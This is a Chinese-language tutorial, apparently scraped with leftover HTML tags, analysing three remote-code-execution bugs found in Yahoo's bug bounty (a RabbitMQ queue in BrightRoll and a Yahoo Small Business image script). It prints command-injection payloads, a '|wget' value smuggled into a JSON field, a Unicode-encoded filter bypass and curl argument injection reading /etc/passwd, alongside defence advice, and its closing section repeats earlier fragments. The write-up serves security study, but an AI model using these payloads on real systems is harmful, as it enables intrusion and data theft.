雅虎网站RCE漏洞挖掘与分析教学文档<\/h1>

1. 漏洞背景<\/h2>
雅虎(Yahoo)漏洞赏金项目中发现的3个RCE漏洞，涉及雅虎的BrightRoll应用和中小企业服务。BrightRoll是雅虎旗下的独立视频广告平台，2014年以6.4亿美元被雅虎收购。<\/p>

2. 第一个RCE漏洞分析<\/h2>

2.1 发现过程<\/h3>

使用Google、Aquatone等工具进行前期踩点<\/li>
Aquatone发现一个有趣的端口页面，显示RabbitMQ消息队列管理面板<\/li>

点击名为

s3_adbox_setup<\/code>的队列进入详情页面<\/li>
<\/ol>
2.2 RabbitMQ简介<\/h3>
RabbitMQ是实现了高级消息队列协议(AMQP)的开源消息代理软件，用Erlang语言编写，支持群集和故障转移。<\/p>
2.3 漏洞利用步骤<\/h3>

观察消息队列格式，发现JSON结构：<\/li>
<\/ol>
{
<\/span><\/span>  "sub_bound"<\/span>: true<\/span>,
<\/span><\/span>  "hostname"<\/span>: "REDACTED"<\/span>,
<\/span><\/span>  "timestamp"<\/span>: "2017\/07\/01\/1649"<\/span>,
<\/span><\/span>  "s3_key"<\/span>: "REDACTED"<\/span>,
<\/span><\/span>  "nop"<\/span>: false<\/span>,
<\/span><\/span>  "providers"<\/span>: ["Google"<\/span>, "AWS"<\/span>],
<\/span><\/span>  "version"<\/span>: 3<\/span>,
<\/span><\/span>  "checkin_queue"<\/span>: "REDACTED"<\/span>,
<\/span><\/span>  "type"<\/span>: "REDACTED"<\/span>,
<\/span><\/span>  "interval_id"<\/span>: "REDACTED"<\/span>,
<\/span><\/span>  "pod_id"<\/span>: "22"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
构造恶意Payload，在pod_id<\/code>参数注入命令：<\/li>
<\/ol>
{
<\/span><\/span>  ...其他字段...,<\/span>
<\/span><\/span>  "pod_id"<\/span>: "22|wget http:\/\/myhost.name"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
成功实现远程命令执行<\/li>
<\/ol>
3. 第二个RCE漏洞分析<\/h2>
3.1 发现过程<\/h3>
在另一台雅虎服务器发现相同应用，但服务器对|<\/code>字符进行了过滤。<\/p>
3.2 绕过技术<\/h3>
使用Unicode编码和URL编码绕过过滤：<\/p>
{
<\/span><\/span>  ...其他字段...,<\/span>
<\/span><\/span>  "pod_id"<\/span>: "23\u000awget\u0020http:\/\/myhost.name"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>其中：<\/p>

\u000a<\/code> 是换行符的Unicode编码<\/li>
\u0020<\/code> 是空格的Unicode编码<\/li>
<\/ul>
4. 第三个RCE漏洞分析<\/h2>
4.1 漏洞背景<\/h3>
与雅虎中小企业服务(yahoo small business)相关，涉及邮件模板功能。<\/p>
4.2 发现过程<\/h3>

访问邮件模板页面，AJAX发送请求获取产品图片路径<\/li>
发现objinfo_data.php<\/code>脚本用于重置产品图片大小<\/li>
产品创建请求中包含图片URL但不含二进制数据<\/li>
<\/ol>
4.3 漏洞利用步骤<\/h3>

编辑产品页，将图片URL指向测试主机<\/li>
使用产品ID向objinfo_data.php<\/code>发起请求<\/li>
Netcat捕获请求，发现User-Agent为Curl<\/li>
尝试命令注入：

使用-A something<\/code>参数注入User-Agent<\/li>
使用-T<\/code>标记读取系统文件<\/li>
<\/ul>
<\/li>
成功读取\/etc\/passwd<\/code><\/li>
<\/ol>
5. 漏洞挖掘方法论总结<\/h2>

信息收集<\/strong>：使用Google、Aquatone等工具进行前期踩点<\/li>
服务识别<\/strong>：识别开放端口运行的服务(RabbitMQ等)<\/li>
功能分析<\/strong>：深入分析服务功能和工作原理<\/li>
输入点探测<\/strong>：寻找可能的输入点(如JSON字段、URL参数)<\/li>
过滤绕过<\/strong>：尝试各种编码和特殊字符绕过过滤<\/li>
SSRF利用<\/strong>：将内部服务暴露为攻击面<\/li>
命令注入<\/strong>：利用系统命令执行功能实现RCE<\/li>
<\/ol>
6. 防御建议<\/h2>

输入验证<\/strong>：对所有输入进行严格验证和过滤<\/li>
编码输出<\/strong>：对输出进行适当的编码处理<\/li>
最小权限<\/strong>：服务运行在最小必要权限下<\/li>
命令执行限制<\/strong>：避免直接使用用户输入执行系统命令<\/li>
日志监控<\/strong>：监控异常请求和命令执行<\/li>
安全编码<\/strong>：使用安全的API替代系统命令调用<\/li>
<\/ol>
7. 工具推荐<\/h2>

信息收集<\/strong>：Google dorks, Aquatone<\/li>
代理工具<\/strong>：Burp Suite, OWASP ZAP<\/li>
网络工具<\/strong>：Netcat, Curl<\/li>
编码工具<\/strong>：CyberChef<\/li>
漏洞验证<\/strong>：自定义脚本<\/li>
<\/ol>
通过以上详细的漏洞分析和挖掘方法，安全研究人员可以更好地理解和发现类似的安全漏洞。<\/p>

雅虎网站RCE漏洞挖掘与分析教学文档<\/h1>

1. 漏洞背景<\/h2> 雅虎(Yahoo)漏洞赏金项目中发现的3个RCE漏洞，涉及雅虎的BrightRoll应用和中小企业服务。BrightRoll是雅虎旗下的独立视频广告平台，2014年以6.4亿美元被雅虎收购。<\/p>

2. 第一个RCE漏洞分析<\/h2>

2.2 RabbitMQ简介<\/h3> RabbitMQ是实现了高级消息队列协议(AMQP)的开源消息代理软件，用Erlang语言编写，支持群集和故障转移。<\/p>

3. 第二个RCE漏洞分析<\/h2>

3.1 发现过程<\/h3> 在另一台雅虎服务器发现相同应用，但服务器对|<\/code>字符进行了过滤。<\/p>

4. 第三个RCE漏洞分析<\/h2>

4.1 漏洞背景<\/h3> 与雅虎中小企业服务(yahoo small business)相关，涉及邮件模板功能。<\/p>

1. 漏洞背景<\/h2>
雅虎(Yahoo)漏洞赏金项目中发现的3个RCE漏洞，涉及雅虎的BrightRoll应用和中小企业服务。BrightRoll是雅虎旗下的独立视频广告平台，2014年以6.4亿美元被雅虎收购。<\/p>

2.2 RabbitMQ简介<\/h3>
RabbitMQ是实现了高级消息队列协议(AMQP)的开源消息代理软件，用Erlang语言编写，支持群集和故障转移。<\/p>

3.1 发现过程<\/h3>
在另一台雅虎服务器发现相同应用，但服务器对`|<\/code>字符进行了过滤。<\/p>`

4.1 漏洞背景<\/h3>
与雅虎中小企业服务(yahoo small business)相关，涉及邮件模板功能。<\/p>